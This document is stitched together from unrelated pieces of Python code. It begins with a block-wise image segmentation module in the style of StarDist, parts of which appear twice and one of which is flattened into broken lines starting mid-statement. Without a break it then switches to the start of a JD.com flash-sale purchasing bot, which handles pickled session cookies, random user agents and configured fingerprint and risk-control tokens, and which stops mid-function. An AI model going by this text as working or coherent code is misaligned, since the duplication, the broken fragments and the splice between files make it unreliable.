        self.coord = coord - np.array([r[0] for r in self.bbox]).reshape(2,1)
        self.slice = tuple(slice(*r) for r in self.bbox)
        self.shape = tuple(r[1]-r[0] for r in self.bbox)
        rr,cc = polygon(*self.coord, self.shape)
        self.mask = np.zeros(self.shape, bool)
        self.mask[rr,cc] = True

    @staticmethod
    def coords_bbox(*coords, shape_max=None):
        assert all(isinstance(c, np.ndarray) and c.ndim==2 and c.shape[0]==2 for c in coords)
        if shape_max is None:
            shape_max = (np.inf, np.inf)
        coord = np.concatenate(coords, axis=1)
        mins = np.maximum(0, np.floor(np.min(coord,axis=1))).astype(int)
        maxs = np.minimum(shape_max, np.ceil(np.max(coord,axis=1))).astype(int)
        return tuple(zip(tuple(mins),tuple(maxs)))


class Polyhedron:

    def __init__(self, dist, origin, rays, bbox=None, shape_max=None):
        self.bbox = self.coords_bbox((dist, origin), rays=rays, shape_max=shape_max) if bbox is None else bbox
        self.slice = tuple(slice(*r) for r in self.bbox)
        self.shape = tuple(r[1]-r[0] for r in self.bbox)
        _origin = origin.reshape(1,3) - np.array([r[0] for r in self.bbox]).reshape(1,3)
        self.mask = polyhedron_to_label(dist[np.newaxis], _origin, rays, shape=self.shape, verbose=False).astype(bool)

    @staticmethod
    def coords_bbox(*dist_origin, rays, shape_max=None):
        dists, points = zip(*dist_origin)
        assert all(isinstance(d, np.ndarray) and d.ndim==1 and len(d)==len(rays) for d in dists)
        assert all(isinstance(p, np.ndarray) and p.ndim==1 and len(p)==3 for p in points)
        dists, points, verts = np.stack(dists)[...,np.newaxis], np.stack(points)[:,np.newaxis], rays.vertices[np.newaxis]
        coord = dists * verts + points
        coord = np.concatenate(coord, axis=0)
        if shape_max is None:
            shape_max = (np.inf, np.inf, np.inf)
        mins = np.maximum(0, np.floor(np.min(coord,axis=0))).astype(int)
        maxs = np.minimum(shape_max, np.ceil(np.max(coord,axis=0))).astype(int)
        return tuple(zip(tuple(mins),tuple(maxs)))


# def repaint_labels(output, labels, polys, show_progress=True):
#     """Repaint object instances in correct order based on probability scores.
#
#     Does modify 'output' and 'polys' in-place, but will only write sparsely to 'output' where needed.
#
#     output: numpy.ndarray or similar
#         Label image (integer-valued)
#     labels: iterable of int
#         List of integer label ids that occur in output
#     polys: dict
#         Dictionary of polygon/polyhedra properties.
#         Assumption is that the label id (-1) corresponds to the index in the polys dict
#     """
#     assert output.ndim in (2,3)
#     if show_progress:
#         labels = tqdm(labels, leave=True)
#
#     labels_eliminated = set()
#
#     # TODO: inelegant to have so much duplicated code here
#     if output.ndim == 2:
#         coord = lambda i: polys['coord'][i-1]
#         prob = lambda i: polys['prob'][i-1]
#         for i in labels:
#             if i in labels_eliminated: continue
#             poly_i = Polygon(coord(i), shape_max=output.shape)
#             # find all labels that overlap with i (including i)
#             overlapping = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0}
#             assert i in overlapping
#             # compute bbox union to find area to crop/replace in large output label image
#             bbox_union = Polygon.coords_bbox(*[coord(j) for j in overlapping], shape_max=output.shape)
#             # crop out label i, including the region that include all overlapping labels
#             poly_i = Polygon(coord(i), bbox=bbox_union)
#             mask = poly_i.mask.copy()
#             # remove pixels from mask that belong to labels with higher probability
#             for j in [j for j in overlapping if prob(j) > prob(i)]:
#                 mask[ Polygon(coord(j), bbox=bbox_union).mask ] = False
#             crop = output[poly_i.slice]
#             crop[crop==i] = 0  # delete all remnants of i in crop
#             crop[mask] = i     # paint i where mask still active
#             labels_remaining = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0}
#             labels_eliminated.update(overlapping - labels_remaining)
#     else:
#         dist = lambda i: polys['dist'][i-1]
#         origin = lambda i: polys['points'][i-1]
#         prob = lambda i: polys['prob'][i-1]
#         rays = polys['rays']
#         for i in labels:
#             if i in labels_eliminated: continue
#             poly_i = Polyhedron(dist(i), origin(i), rays, shape_max=output.shape)
#             # find all labels that overlap with i (including i)
#             overlapping = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0}
#             assert i in overlapping
#             # compute bbox union to find area to crop/replace in large output label image
#             bbox_union = Polyhedron.coords_bbox(*[(dist(j),origin(j)) for j in overlapping], rays=rays, shape_max=output.shape)
#             # crop out label i, including the region that include all overlapping labels
#             poly_i = Polyhedron(dist(i), origin(i), rays, bbox=bbox_union)
#             mask = poly_i.mask.copy()
#             # remove pixels from mask that belong to labels with higher probability
#             for j in [j for j in overlapping if prob(j) > prob(i)]:
#                 mask[ Polyhedron(dist(j), origin(j), rays, bbox=bbox_union).mask ] = False
#             crop = output[poly_i.slice]
#             crop[crop==i] = 0  # delete all remnants of i in crop
#             crop[mask] = i     # paint i where mask still active
#             labels_remaining = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0}
#             labels_eliminated.update(overlapping - labels_remaining)
#
#     if len(labels_eliminated) > 0:
#         ind = [i-1 for i in labels_eliminated]
#         for k,v in polys.items():
#             if k in OBJECT_KEYS:
#                 polys[k] = np.delete(v, ind, axis=0)


############


def predict_big(model, *args, **kwargs):
    from .models import StarDist2D, StarDist3D
    if isinstance(model,(StarDist2D,StarDist3D)):
        dst = model.__class__.__name__
    else:
        dst = '{StarDist2D, StarDist3D}'
    raise RuntimeError(f"This function has moved to {dst}.predict_instances_big.")


class NotFullyVisible(Exception):
    pass


def _grid_divisible(grid, size, name=None, verbose=True):
    if size % grid == 0:
        return size
    _size = size
    size = math.ceil(size / grid) * grid
    if bool(verbose):
        print(f"{verbose if isinstance(verbose,str) else ''}increasing '{'value' if name is None else name}' from {_size} to {size} to be evenly divisible by {grid} (grid)", flush=True)
    assert size % grid == 0
    return size
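

# --- illustrative sketch (added for clarity, not part of the original module) ---
# _grid_divisible rounds a value up to the next multiple of `grid` (and reports
# the adjustment when verbose); e.g. a block_size of 100 with grid 16 becomes 112.
def _example_grid_divisible():
    assert _grid_divisible(16, 96, name='block_size', verbose=False) == 96    # already divisible
    assert _grid_divisible(16, 100, name='block_size', verbose=False) == 112  # ceil(100/16)*16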
size # def render_polygons(polys, shape): # return polygons_to_label_coord(polys['coord'], shape=shape)
import numpy as np import warnings import math from tqdm import tqdm from skimage.measure import regionprops from skimage.draw import polygon from csbdeep.utils import _raise, axes_check_and_normalize, axes_dict from itertools import product from .geometry import polygons_to_label_coord, polyhedron_to_label OBJECT_KEYS = set(('prob', 'points', 'coord', 'dist', 'class_prob', 'class_id')) COORD_KEYS = set(('points', 'coord')) class Block: """One-dimensional block as part of a chain. There are no explicit start and end positions. Instead, each block is aware of its predecessor and successor and derives such things (recursively) based on its neighbors. Blocks overlap with one another (at least min_overlap + 2*context) and have a read region (the entire block) and a write region (ignoring context). Given a query interval, Block.is_responsible will return true for only one block of a chain (or raise an exception if the interval is larger than min_overlap or even the entire block without context). """ def __init__(self, size, min_overlap, context, pred): self.size = int(size) self.min_overlap = int(min_overlap) self.context = int(context) self.pred = pred self.succ = None assert 0 <= self.min_overlap + 2*self.context < self.size self.stride = self.size - (self.min_overlap + 2*self.context) self._start = 0 self._frozen = False @property def start(self): return self._start if (self.frozen or self.at_begin) else self.pred.succ_start @property def end(self): return self.start + self.size @property def succ_start(self): return self.start + self.stride def add_succ(self): assert self.succ is None and not self.frozen self.succ = Block(self.size, self.min_overlap, self.context, self) return self.succ def decrease_stride(self, amount): amount = int(amount) assert 0 <= amount < self.stride and not self.frozen self.stride -= amount def freeze(self): """Call on first block to freeze entire chain (after construction is done)""" assert not self.frozen and (self.at_begin or self.pred.frozen) self._start = self.start self._frozen = True if not self.at_end: self.succ.freeze() @property def slice_read(self): return slice(self.start, self.end) @property def slice_crop_context(self): """Crop context relative to read region""" return slice(self.context_start, self.size - self.context_end) @property def slice_write(self): return slice(self.start + self.context_start, self.end - self.context_end) def is_responsible(self, bbox): """Responsibility for query interval bbox, which is assumed to be smaller than min_overlap. If the assumption is met, only one block of a chain will return true. If violated, one or more blocks of a chain may raise a NotFullyVisible exception. The exception will have an argument that is False if bbox is larger than min_overlap, and True if bbox is even larger than the entire block without context. bbox: (int,int) 1D bounding box interval with coordinates relative to size without context """ bmin, bmax = bbox r_start = 0 if self.at_begin else (self.pred.overlap - self.pred.context_end - self.context_start) r_end = self.size - self.context_start - self.context_end assert 0 <= bmin < bmax <= r_end # assert not (bmin == 0 and bmax >= r_start and not self.at_begin), [(r_start,r_end), bbox, self] if bmin == 0 and bmax >= r_start: if bmax == r_end: # object spans the entire block, i.e. is probably larger than size (minus the context) raise NotFullyVisible(True) if not self.at_begin: # object spans the entire overlap region, i.e. 
is only partially visible here and also by the predecessor block raise NotFullyVisible(False) # object ends before responsible region start if bmax < r_start: return False # object touches the end of the responsible region (only take if at end) if bmax == r_end and not self.at_end: return False return True # ------------------------ @property def frozen(self): return self._frozen @property def at_begin(self): return self.pred is None @property def at_end(self): return self.succ is None @property def overlap(self): return self.size - self.stride @property def context_start(self): return 0 if self.at_begin else self.context @property def context_end(self): return 0 if self.at_end else self.context def __repr__(self): shared = f'{self.start:03}:{self.end:03}' shared += f', size={self.context_start}-{self.size-self.context_start-self.context_end}-{self.context_end}' if self.at_end: return f'{self.__class__.__name__}({shared})' else: return f'{self.__class__.__name__}({shared}, overlap={self.overlap}/{self.overlap-self.context_start-self.context_end})' @property def chain(self): blocks = [self] while not blocks[-1].at_end: blocks.append(blocks[-1].succ) return blocks def __iter__(self): return iter(self.chain) # ------------------------ @staticmethod def cover(size, block_size, min_overlap, context, grid=1, verbose=True): """Return chain of grid-aligned blocks to cover the interval [0,size]. Parameters block_size, min_overlap, and context will be used for all blocks of the chain. Only the size of the last block may differ. Except for the last block, start and end positions of all blocks will be multiples of grid. To that end, the provided block parameters may be increased to achieve that. Note that parameters must be chosen such that the write regions of only neighboring blocks are overlapping. 
""" assert 0 <= min_overlap+2*context < block_size <= size assert 0 < grid <= block_size block_size = _grid_divisible(grid, block_size, name='block_size', verbose=verbose) min_overlap = _grid_divisible(grid, min_overlap, name='min_overlap', verbose=verbose) context = _grid_divisible(grid, context, name='context', verbose=verbose) # allow size not to be divisible by grid size_orig = size size = _grid_divisible(grid, size, name='size', verbose=False) # divide all sizes by grid assert all(v % grid == 0 for v in (size, block_size, min_overlap, context)) size //= grid block_size //= grid min_overlap //= grid context //= grid # compute cover in grid-multiples t = first = Block(block_size, min_overlap, context, None) while t.end < size: t = t.add_succ() last = t # [print(t) for t in first] # move blocks around to make it fit excess = last.end - size t = first while excess > 0: t.decrease_stride(1) excess -= 1 t = t.succ if (t == last): t = first # make a copy of the cover and multiply sizes by grid if grid > 1: size *= grid block_size *= grid min_overlap *= grid context *= grid # _t = _first = first t = first = Block(block_size, min_overlap, context, None) t.stride = _t.stride*grid while not _t.at_end: _t = _t.succ t = t.add_succ() t.stride = _t.stride*grid last = t # change size of last block # will be padded internally to the same size # as the others by model.predict_instances size_delta = size - size_orig last.size -= size_delta assert 0 <= size_delta < grid # for efficiency (to not determine starts recursively from now on) first.freeze() blocks = first.chain # sanity checks assert first.start == 0 and last.end == size_orig assert all(t.overlap-2*context >= min_overlap for t in blocks if t != last) assert all(t.start % grid == 0 and t.end % grid == 0 for t in blocks if t != last) # print(); [print(t) for t in first] # only neighboring blocks should be overlapping if len(blocks) >= 3: for t in blocks[:-2]: assert t.slice_write.stop <= t.succ.succ.slice_write.start return blocks class BlockND: """N-dimensional block. Each BlockND simply consists of a 1-dimensional Block per axis and also has an id (which should be unique). The n-dimensional region represented by each BlockND is the intersection of all 1D Blocks per axis. Also see `Block`. 
""" def __init__(self, id, blocks, axes): self.id = id self.blocks = tuple(blocks) self.axes = axes_check_and_normalize(axes, length=len(self.blocks)) self.axis_to_block = dict(zip(self.axes,self.blocks)) def blocks_for_axes(self, axes=None): axes = self.axes if axes is None else axes_check_and_normalize(axes) return tuple(self.axis_to_block[a] for a in axes) def slice_read(self, axes=None): return tuple(t.slice_read for t in self.blocks_for_axes(axes)) def slice_crop_context(self, axes=None): return tuple(t.slice_crop_context for t in self.blocks_for_axes(axes)) def slice_write(self, axes=None): return tuple(t.slice_write for t in self.blocks_for_axes(axes)) def read(self, x, axes=None): """Read block "read region" from x (numpy.ndarray or similar)""" return x[self.slice_read(axes)] def crop_context(self, labels, axes=None): return labels[self.slice_crop_context(axes)] def write(self, x, labels, axes=None): """Write (only entries > 0 of) labels to block "write region" of x (numpy.ndarray or similar)""" s = self.slice_write(axes) mask = labels > 0 # x[s][mask] = labels[mask] # doesn't work with zarr region = x[s] region[mask] = labels[mask] x[s] = region def is_responsible(self, slices, axes=None): return all(t.is_responsible((s.start,s.stop)) for t,s in zip(self.blocks_for_axes(axes),slices)) def __repr__(self): slices = ','.join(f'{a}={t.start:03}:{t.end:03}' for t,a in zip(self.blocks,self.axes)) return f'{self.__class__.__name__}({self.id}|{slices})' def __iter__(self): return iter(self.blocks) # ------------------------ def filter_objects(self, labels, polys, axes=None): """Filter out objects that block is not responsible for. Given label image 'labels' and dictionary 'polys' of polygon/polyhedron objects, only retain those objects that this block is responsible for. This function will return a pair (labels, polys) of the modified label image and dictionary. It will raise a RuntimeError if an object is found in the overlap area of neighboring blocks that violates the assumption to be smaller than 'min_overlap'. If parameter 'polys' is None, only the filtered label image will be returned. Notes ----- - Important: It is assumed that the object label ids in 'labels' and the entries in 'polys' are sorted in the same way. - Does not modify 'labels' and 'polys', but returns modified copies. Example ------- >>> labels, polys = model.predict_instances(block.read(img)) >>> labels = block.crop_context(labels) >>> labels, polys = block.filter_objects(labels, polys) """ # TODO: option to update labels in-place assert np.issubdtype(labels.dtype, np.integer) ndim = len(self.blocks_for_axes(axes)) assert ndim in (2,3) assert labels.ndim == ndim and labels.shape == tuple(s.stop-s.start for s in self.slice_crop_context(axes)) labels_filtered = np.zeros_like(labels) # problem_ids = [] for r in regionprops(labels): slices = tuple(slice(r.bbox[i],r.bbox[i+labels.ndim]) for i in range(labels.ndim)) try: if self.is_responsible(slices, axes): labels_filtered[slices][r.image] = r.label except NotFullyVisible as e: # shape_block_write = tuple(s.stop-s.start for s in self.slice_write(axes)) shape_object = tuple(s.stop-s.start for s in slices) shape_min_overlap = tuple(t.min_overlap for t in self.blocks_for_axes(axes)) raise RuntimeError(f"Found object of shape {shape_object}, which violates the assumption of being smaller than 'min_overlap' {shape_min_overlap}. 
Increase 'min_overlap' to avoid this problem.")
                # if e.args[0]: # object larger than block write region
                #     assert any(o >= b for o,b in zip(shape_object,shape_block_write))
                #     # problem, since this object will probably be saved by another block too
                #     raise RuntimeError(f"Found object of shape {shape_object}, larger than an entire block's write region of shape {shape_block_write}. Increase 'block_size' to avoid this problem.")
                #     # print("found object larger than 'block_size'")
                # else:
                #     assert any(o >= b for o,b in zip(shape_object,shape_min_overlap))
                #     # print("found object larger than 'min_overlap'")
                #     # keep object, because will be dealt with later, i.e.
                #     # render the poly again into the label image, but this is not
                #     # ideal since the assumption is that the object outside that
                #     # region is not reliable because it's in the context
                #     labels_filtered[slices][r.image] = r.label
                #     problem_ids.append(r.label)

        if polys is None:
            # assert len(problem_ids) == 0
            return labels_filtered
        else:
            # it is assumed that ids in 'labels' map to entries in 'polys'
            assert isinstance(polys,dict) and any(k in polys for k in COORD_KEYS)
            filtered_labels = np.unique(labels_filtered)
            filtered_ind = [i-1 for i in filtered_labels if i > 0]
            polys_out = {k: (v[filtered_ind] if k in OBJECT_KEYS else v) for k,v in polys.items()}
            for k in COORD_KEYS:
                if k in polys_out.keys():
                    polys_out[k] = self.translate_coordinates(polys_out[k], axes=axes)
            return labels_filtered, polys_out#, tuple(problem_ids)

    def translate_coordinates(self, coordinates, axes=None):
        """Translate local block coordinates (of read region) to global ones based on block position"""
        ndim = len(self.blocks_for_axes(axes))
        assert isinstance(coordinates, np.ndarray) and coordinates.ndim >= 2 and coordinates.shape[1] == ndim
        start = [s.start for s in self.slice_read(axes)]
        shape = tuple(1 if d!=1 else ndim for d in range(coordinates.ndim))
        start = np.array(start).reshape(shape)
        return coordinates + start

    # ------------------------

    @staticmethod
    def cover(shape, axes, block_size, min_overlap, context, grid=1):
        """Return grid-aligned n-dimensional blocks to cover region of the given shape with axes semantics.

        Parameters block_size, min_overlap, and context can be different per dimension/axis
        (if provided as list) or the same (if provided as scalar value).

        Also see `Block.cover`.
        """
        shape = tuple(shape)
        n = len(shape)
        axes = axes_check_and_normalize(axes, length=n)
        if np.isscalar(block_size): block_size = n*[block_size]
        if np.isscalar(min_overlap): min_overlap = n*[min_overlap]
        if np.isscalar(context): context = n*[context]
        if np.isscalar(grid): grid = n*[grid]
        assert n == len(block_size) == len(min_overlap) == len(context) == len(grid)

        # compute cover for each dimension
        cover_1d = [Block.cover(*args) for args in zip(shape, block_size, min_overlap, context, grid)]
        # return cover as Cartesian product of 1-dimensional blocks
        return tuple(BlockND(i,blocks,axes) for i,blocks in enumerate(product(*cover_1d)))


class Polygon:

    def __init__(self, coord, bbox=None, shape_max=None):
        self.bbox = self.coords_bbox(coord, shape_max=shape_max) if bbox is None else bbox
        self.coord = coord - np.array([r[0] for r in self.bbox]).reshape(2,1)
        self.slice = tuple(slice(*r) for r in self.bbox)
        self.shape = tuple(r[1]-r[0] for r in self.bbox)
        rr,cc = polygon(*self.coord, self.shape)
        # use the builtin bool: np.bool is deprecated and removed in recent NumPy versions
        self.mask = np.zeros(self.shape, bool)
        self.mask[rr,cc] = True

    @staticmethod
    def coords_bbox(*coords, shape_max=None):
        assert all(isinstance(c, np.ndarray) and c.ndim==2 and c.shape[0]==2 for c in coords)
        if shape_max is None:
            shape_max = (np.inf, np.inf)
        coord = np.concatenate(coords, axis=1)
        mins = np.maximum(0, np.floor(np.min(coord,axis=1))).astype(int)
        maxs = np.minimum(shape_max, np.ceil (np.max(coord,axis=1))).astype(int)
        return tuple(zip(tuple(mins),tuple(maxs)))


class Polyhedron:

    def __init__(self, dist, origin, rays, bbox=None, shape_max=None):
        self.bbox = self.coords_bbox((dist, origin), rays=rays, shape_max=shape_max) if bbox is None else bbox
        self.slice = tuple(slice(*r) for r in self.bbox)
        self.shape = tuple(r[1]-r[0] for r in self.bbox)
        _origin = origin.reshape(1,3) - np.array([r[0] for r in self.bbox]).reshape(1,3)
        # astype(bool) instead of deprecated np.bool
        self.mask = polyhedron_to_label(dist[np.newaxis], _origin, rays, shape=self.shape, verbose=False).astype(bool)

    @staticmethod
    def coords_bbox(*dist_origin, rays, shape_max=None):
        dists, points = zip(*dist_origin)
        assert all(isinstance(d, np.ndarray) and d.ndim==1 and len(d)==len(rays) for d in dists)
        assert all(isinstance(p, np.ndarray) and p.ndim==1 and len(p)==3 for p in points)
        dists, points, verts = np.stack(dists)[...,np.newaxis], np.stack(points)[:,np.newaxis], rays.vertices[np.newaxis]
        coord = dists * verts + points
        coord = np.concatenate(coord, axis=0)
        if shape_max is None:
            shape_max = (np.inf, np.inf, np.inf)
        mins = np.maximum(0, np.floor(np.min(coord,axis=0))).astype(int)
        maxs = np.minimum(shape_max, np.ceil (np.max(coord,axis=0))).astype(int)
        return tuple(zip(tuple(mins),tuple(maxs)))


# def repaint_labels(output, labels, polys, show_progress=True):
#     """Repaint object instances in correct order based on probability scores.
#     Does modify 'output' and 'polys' in-place, but will only write sparsely to 'output' where needed.
#
#     output: numpy.ndarray or similar
#         Label image (integer-valued)
#     labels: iterable of int
#         List of integer label ids that occur in output
#     polys: dict
#         Dictionary of polygon/polyhedra properties.
#         Assumption is that the label id (-1) corresponds to the index in the polys dict
#     """
#     assert output.ndim in (2,3)
#     if show_progress:
#         labels = tqdm(labels, leave=True)
#     labels_eliminated = set()
#     # TODO: inelegant to have so much duplicated code here
#     if output.ndim == 2:
#         coord = lambda i: polys['coord'][i-1]
#         prob = lambda i: polys['prob'][i-1]
#         for i in labels:
#             if i in labels_eliminated: continue
#             poly_i = Polygon(coord(i), shape_max=output.shape)
#             # find all labels that overlap with i (including i)
#             overlapping = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0}
#             assert i in overlapping
#             # compute bbox union to find area to crop/replace in large output label image
#             bbox_union = Polygon.coords_bbox(*[coord(j) for j in overlapping], shape_max=output.shape)
#             # crop out label i, including the region that include all overlapping labels
#             poly_i = Polygon(coord(i), bbox=bbox_union)
#             mask = poly_i.mask.copy()
#             # remove pixels from mask that belong to labels with higher probability
#             for j in [j for j in overlapping if prob(j) > prob(i)]:
#                 mask[ Polygon(coord(j), bbox=bbox_union).mask ] = False
#             crop = output[poly_i.slice]
#             crop[crop==i] = 0 # delete all remnants of i in crop
#             crop[mask] = i    # paint i where mask still active
#             labels_remaining = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0}
#             labels_eliminated.update(overlapping - labels_remaining)
#     else:
#         dist = lambda i: polys['dist'][i-1]
#         origin = lambda i: polys['points'][i-1]
#         prob = lambda i: polys['prob'][i-1]
#         rays = polys['rays']
#         for i in labels:
#             if i in labels_eliminated: continue
#             poly_i = Polyhedron(dist(i), origin(i), rays, shape_max=output.shape)
#             # find all labels that overlap with i (including i)
#             overlapping = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0}
#             assert i in overlapping
#             # compute bbox union to find area to crop/replace in large output label image
#             bbox_union = Polyhedron.coords_bbox(*[(dist(j),origin(j)) for j in overlapping], rays=rays, shape_max=output.shape)
#             # crop out label i, including the region that include all overlapping labels
#             poly_i = Polyhedron(dist(i), origin(i), rays, bbox=bbox_union)
#             mask = poly_i.mask.copy()
#             # remove pixels from mask that belong to labels with higher probability
#             for j in [j for j in overlapping if prob(j) > prob(i)]:
#                 mask[ Polyhedron(dist(j), origin(j), rays, bbox=bbox_union).mask ] = False
#             crop = output[poly_i.slice]
#             crop[crop==i] = 0 # delete all remnants of i in crop
#             crop[mask] = i    # paint i where mask still active
#             labels_remaining = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0}
#             labels_eliminated.update(overlapping - labels_remaining)
#     if len(labels_eliminated) > 0:
#         ind = [i-1 for i in labels_eliminated]
#         for k,v in polys.items():
#             if k in OBJECT_KEYS:
#                 polys[k] = np.delete(v, ind, axis=0)


############


def predict_big(model, *args, **kwargs):
    from .models import StarDist2D, StarDist3D
    if isinstance(model,(StarDist2D,StarDist3D)):
        dst = model.__class__.__name__
    else:
        dst = '{StarDist2D, StarDist3D}'
    raise RuntimeError(f"This function has moved to {dst}.predict_instances_big.")


class NotFullyVisible(Exception):
    pass


def _grid_divisible(grid, size, name=None, verbose=True):
    if size % grid == 0:
        return size
    _size = size
    size = math.ceil(size / grid) * grid
    if bool(verbose):
        print(f"{verbose if isinstance(verbose,str) else ''}increasing '{'value' if name is None else name}' from {_size} to {size} to be evenly divisible by {grid} (grid)", flush=True)
    assert size % grid == 0
    return size


# def render_polygons(polys, shape):
#     return polygons_to_label_coord(polys['coord'], shape=shape)
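
# --------------------------------------------------------------------------------------
# Illustrative example (not part of the original module): a minimal sketch of how the
# classes above compose into block-wise prediction, following the example shown in the
# BlockND.filter_objects docstring. It assumes a trained StarDist2D-like `model` object
# exposing `predict_instances` and `config.grid`, and a 2D image `img`; the block_size,
# min_overlap, and context values are illustrative only. In practice, prefer the
# library's own StarDist2D.predict_instances_big, which wraps this pattern and adds
# consistent relabeling and polygon bookkeeping.

def _example_predict_blockwise(model, img, axes='YX'):
    """Sketch only: predict a large 2D image block by block and stitch the label images."""
    output = np.zeros(img.shape, dtype=np.int32)                    # full-size label image
    blocks = BlockND.cover(img.shape, axes=axes, block_size=1024,
                           min_overlap=64, context=128, grid=model.config.grid)
    label_offset = 0
    for block in blocks:
        # predict on the block's read region (block incl. context)
        labels, polys = model.predict_instances(block.read(img, axes=axes))
        labels = block.crop_context(labels, axes=axes)              # discard the context margin
        # keep only the objects this block is responsible for
        labels, polys = block.filter_objects(labels, polys, axes=axes)
        if labels.max() > 0:
            labels[labels > 0] += label_offset                      # make ids unique across blocks
            label_offset = int(labels.max())
        block.write(output, labels, axes=axes)                      # paste non-zero labels into output
    return output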
#!/usr/bin/env python # -*- coding: utf-8 -*- import json import os import pickle import random import re import time from datetime import datetime, timedelta from urllib import parse import requests from bs4 import BeautifulSoup import CustomBrowser import address_util from config import global_config from exception import AsstException from log import logger from messenger import Messenger from socketclient import SocketClient, util from socketclient.utils import http_util from socketclient.utils.http import cookie_util from timer import Timer from util import ( DEFAULT_TIMEOUT, DEFAULT_USER_AGENT, check_login, deprecated, encrypt_pwd, encrypt_payment_pwd, get_tag_value, get_random_useragent, open_image, parse_area_id, parse_json, parse_sku_id, parse_items_dict, response_status, save_image, split_area_id, DEFAULT_M_USER_AGENT, nested_parser, nested_inner_parser ) class Assistant(object): def __init__(self, use_new=False): self.config = None self.backend_mod = util.load_backend('gevent') self.sem = self.backend_mod.Semaphore(1) self.event = self.backend_mod.Event() self.socket_client = SocketClient(backend=self.backend_mod) # 功能相关 self.concurrent_gevent_array = [] self.concurrent_count = global_config.concurrent_count self.start_func = None self.chromedriver_path = global_config.get('config', 'chromedriver_path') self.chrome_path = global_config.get('config', 'chrome_path') self.timeout = float(global_config.get('config', 'timeout') or DEFAULT_TIMEOUT) self.send_message = global_config.getboolean('messenger', 'enable') self.messenger = Messenger(global_config.get('messenger', 'sckey')) if self.send_message else None use_random_ua = global_config.getboolean('config', 'random_useragent') if use_new: self.user_agent = DEFAULT_M_USER_AGENT elif not use_random_ua: self.user_agent = DEFAULT_USER_AGENT else: self.user_agent = get_random_useragent() self.use_new = use_new self.br = None self.headers = {'User-Agent': self.user_agent} # 用户相关 if use_new: self.data = dict() self.eid = global_config.get('config', 'eid') self.fp = global_config.get('config', 'fp') self.track_id = global_config.get('config', 'track_id') self.risk_control = global_config.get('config', 'risk_control') self.letterMap = ["Z", "A", "B", "C", "D", "E", "F", "G", "H", "I"] self.area_id = None self.item_zzz = dict() self.item_url_param = dict() self.item_cat = dict() self.item_vender_ids = dict() # 记录商家id self.param_json = dict() # 记录参数 self.special_attrs = dict() # self.seckill_init_info = dict() # self.seckill_order_data = dict() # self.seckill_url = dict() self.item_requests = [] self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.username = '' self.nick_name = '' self.is_login = False self.sess = requests.session() self.cookies_str = None # 请求信息 self.request_info = dict() try: self._load_cookies() except Exception: pass # 已登录则刷新cookies if self.is_login: self.nick_name = self.get_user_info() self._save_cookies() def init_browser(self, headless=True): br = self.br = CustomBrowser.CustomBrowser(self.user_agent, self.chromedriver_path, self.chrome_path, headless) count = 0 # 启动浏览器 while True: try: br.openUrl('chrome://version/') except Exception as e: logger.error(e) logger.error(f'无法初始化浏览器cookies,' 
f'请检查config.ini文件中chromedriver_path与chrome_path的配置 或 检查网络代理是否关闭,开启代理会导致浏览器初始化失败') if count > 3: if br: br.quit() logger.error('初始化浏览器cookies失败!' '请检查config.ini文件中chromedriver_path与chrome_path的配置 或 检查网络代理是否关闭,开启代理会导致浏览器初始化失败!') exit(-1) else: break count += 1 logger.info('初始化下单参数失败!开始第 %s 次重试', count) return br @property def seckill_url(self): return self.item_requests[0] @property def is_request_seckill_url(self): return self.item_requests[1] @property def seckill_init_info(self): return self.item_requests[2] @property def seckill_order_data(self): return self.item_requests[3] @property def is_seckill_checkout_page(self): return self.item_requests[4] @property def is_add_cart_request(self): return self.item_requests[5] @property def is_get_checkout_page(self): return self.item_requests[6] @property def get_submit_page_data(self): return self.item_requests[7] @property def get_promiseUuid(self): return self.item_requests[8] @property def get_submit_data(self): return self.item_requests[9] @property def get_submit_referer(self): return self.item_requests[10] def _load_cookies(self): cookies_file = '' for name in os.listdir('../cookies'): if name.endswith('.cookies'): cookies_file = '../cookies/{0}'.format(name) break with open(cookies_file, 'rb') as f: local_cookies = pickle.load(f) self.sess.cookies.update(local_cookies) self.is_login = self._validate_cookies() def _save_cookies(self): cookies_file = '../cookies/{0}.cookies'.format(self.nick_name) directory = os.path.dirname(cookies_file) if not os.path.exists(directory): os.makedirs(directory) with open(cookies_file, 'wb') as f: pickle.dump(self.sess.cookies, f) def _validate_cookies(self): """验证cookies是否有效(是否登陆) 通过访问用户订单列表页进行判断:若未登录,将会重定向到登陆页面。 :return: cookies是否有效 True/False """ if self.use_new: url = 'https://wq.jd.com/user/info/GetUserAllPinInfo' # url = 'https://home.m.jd.com/myJd/home.action' # url = 'https://home.m.jd.com/userinfom/QueryUserInfoM' params = { 'sceneval': 2, 'g_login_type': 1, 'callback': 'userInfoCallBack', 'g_ty': 'ls', '_': str(int(time.time() * 1000)) } try: resp = self.sess.get(url=url, params=params, headers={'dnt': '1', 'referer': 'https://wqs.jd.com/', 'sec-fetch-dest': 'script', 'sec-fetch-mode': 'no-cors', 'sec-fetch-site': 'same-site', 'user-agent': self.user_agent}, allow_redirects=False) if resp.status_code == requests.codes.OK: html = resp.text if html and 'pin' in html: match = re.search(r'^try\{userInfoCallBack\((.*)\);\}catch\(e\)\{\}$', html) if match: json_str = match.group(1) if json_str: json_dict = json.loads(json_str) self.nick_name = json_dict['userdata']['renderJDDate'][0]['msg']['nickname'] return True except Exception as e: logger.error(e) self.sess = requests.session() return False else: url = 'https://order.jd.com/center/list.action' # payload = { # 'rid': str(int(time.time() * 1000)), # } try: resp = self.sess.get(url=url, headers={'dnt': '1', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'none', 'upgrade-insecure-requests': '1', 'user-agent': self.user_agent}, allow_redirects=False) if resp.status_code == requests.codes.OK: return True except Exception as e: logger.error(e) self.sess = requests.session() return False @deprecated def _need_auth_code(self, username): url = 'https://passport.jd.com/uc/showAuthCode' data = { 'loginName': username, } payload = { 'version': 2015, 'r': random.random(), } resp = self.sess.post(url, params=payload, data=data, headers=self.headers) if not response_status(resp): 